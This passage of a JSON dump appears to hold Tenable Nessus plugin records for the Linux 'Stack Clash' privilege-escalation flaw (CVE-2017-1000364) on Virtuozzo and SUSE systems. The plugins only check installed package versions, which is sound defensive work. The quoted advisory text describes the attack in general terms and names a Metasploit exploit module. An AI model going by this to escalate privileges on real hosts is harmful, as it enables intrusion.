["p-cpe:/a:virtuozzo:virtuozzo:crit", "p-cpe:/a:virtuozzo:virtuozzo:criu", "p-cpe:/a:virtuozzo:virtuozzo:criu-devel", "p-cpe:/a:virtuozzo:virtuozzo:python-criu", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel-debug", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel-debug-devel", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel-devel", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel-headers", "cpe:/o:virtuozzo:virtuozzo:7"], "id": "VIRTUOZZO_VZA-2017-056.NASL", "href": "https://www.tenable.com/plugins/nessus/101053", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101053);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000364\"\n );\n\n script_name(english:\"Virtuozzo 7 : crit / criu / criu-devel / python-criu / vzkernel / etc (VZA-2017-056)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the crit / criu / criu-devel /\npython-criu / vzkernel / etc packages installed, the Virtuozzo\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - A flaw was found in the way memory was being allocated\n on the stack for user space binaries. If heap (or\n different memory region) and stack memory regions were\n adjacent to each other, an attacker could use this flaw\n to jump over the stack guard gap, cause controlled\n memory corruption on process stack or the adjacent\n memory region, and thus increase their privileges on\n the system. This is a kernel-side mitigation which\n increases the stack guard gap size from one page to 1\n MiB to make successful exploitation of this issue more\n difficult.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2830148\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected crit / criu / criu-devel / python-criu / vzkernel / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:crit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:criu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:criu-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:python-criu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"crit-2.10.0.50-1.vz7\",\n \"criu-2.10.0.50-1.vz7\",\n \"criu-devel-2.10.0.50-1.vz7\",\n \"python-criu-2.10.0.50-1.vz7\",\n \"vzkernel-3.10.0-514.16.1.vz7.30.15\",\n \"vzkernel-debug-3.10.0-514.16.1.vz7.30.15\",\n \"vzkernel-debug-devel-3.10.0-514.16.1.vz7.30.15\",\n \"vzkernel-devel-3.10.0-514.16.1.vz7.30.15\",\n \"vzkernel-headers-3.10.0-514.16.1.vz7.30.15\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"crit / criu / criu-devel / python-criu / vzkernel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:43", "description": "This update for the Linux Kernel 3.12.74-60_64_40 fixes one issue. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1943-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_40-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_40-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1943-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101945", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1943-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101945);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1943-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_40 fixes one issue. The\nfollowing security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171943-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e594bbba\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1209=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1209=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_40-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_40-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_40-default-2-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_40-xen-2-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:44", "description": "According to the version of the parallels-server-bm-release / vzkernel / etc packages installed, the Virtuozzo installation on the remote host is affected by the following vulnerability :\n\n - An updated fix for CVE-2017-1000364 (kernel: heap/stack gap jumping via unbounded stack allocations). The fix released in the 042stab123.8 kernel was not fully correct.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-05T00:00:00", "type": "nessus", "title": "Virtuozzo 6 : parallels-server-bm-release / vzkernel / etc (VZA-2017-061)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:parallels-server-bm-release", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel-devel", "p-cpe:/a:virtuozzo:virtuozzo:vzkernel-firmware", "p-cpe:/a:virtuozzo:virtuozzo:vzmodules", "p-cpe:/a:virtuozzo:virtuozzo:vzmodules-devel", "cpe:/o:virtuozzo:virtuozzo:6"], "id": "VIRTUOZZO_VZA-2017-061.NASL", "href": "https://www.tenable.com/plugins/nessus/101207", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101207);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000364\"\n );\n\n script_name(english:\"Virtuozzo 6 : parallels-server-bm-release / vzkernel / etc (VZA-2017-061)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the parallels-server-bm-release /\nvzkernel / etc packages installed, the Virtuozzo installation on the\nremote host is affected by the following vulnerability :\n\n - An updated fix for CVE-2017-1000364 (kernel: heap/stack\n gap jumping via unbounded stack allocations). The fix\n released in the 042stab123.8 kernel was not fully\n correct.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2834621\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected parallels-server-bm-release / vzkernel / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:parallels-server-bm-release\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzmodules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzmodules-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"parallels-server-bm-release-6.0.12-3681\",\n \"vzkernel-2.6.32-042stab123.9\",\n \"vzkernel-devel-2.6.32-042stab123.9\",\n \"vzkernel-firmware-2.6.32-042stab123.9\",\n \"vzmodules-2.6.32-042stab123.9\",\n \"vzmodules-devel-2.6.32-042stab123.9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"parallels-server-bm-release / vzkernel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:10", "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various security and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000364: The default stack guard page was too small and could be 'jumped over' by userland programs using more than one page of stack in functions and so lead to memory corruption. This update extends the stack guard page to 1 MB (for 4k pages) and 16 MB (for 64k pages) to reduce this attack vector. This is not a kernel bugfix, but a hardening measure against this kind of userland attack.(bsc#1039348)\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:1617-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-syms", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1617-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100915", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1617-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100915);\n script_version(\"3.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:1617-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP2 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000364: The default stack guard page was too\n small and could be 'jumped over' by userland programs\n using more than one page of stack in functions and so\n lead to memory corruption. This update extends the stack\n guard page to 1 MB (for 4k pages) and 16 MB (for 64k\n pages) to reduce this attack vector. This is not a\n kernel bugfix, but a hardening measure against this kind\n of userland attack.(bsc#1039348)\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037384\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171617-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f48a571c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch\nSUSE-SLE-WE-12-SP2-2017-994=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-994=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-994=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-994=1\n\nSUSE Linux Enterprise Live Patching 12:zypper in -t patch\nSUSE-SLE-Live-Patching-12-2017-994=1\n\nSUSE Linux Enterprise High Availability 12-SP2:zypper in -t patch\nSUSE-SLE-HA-12-SP2-2017-994=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-994=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-994=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" 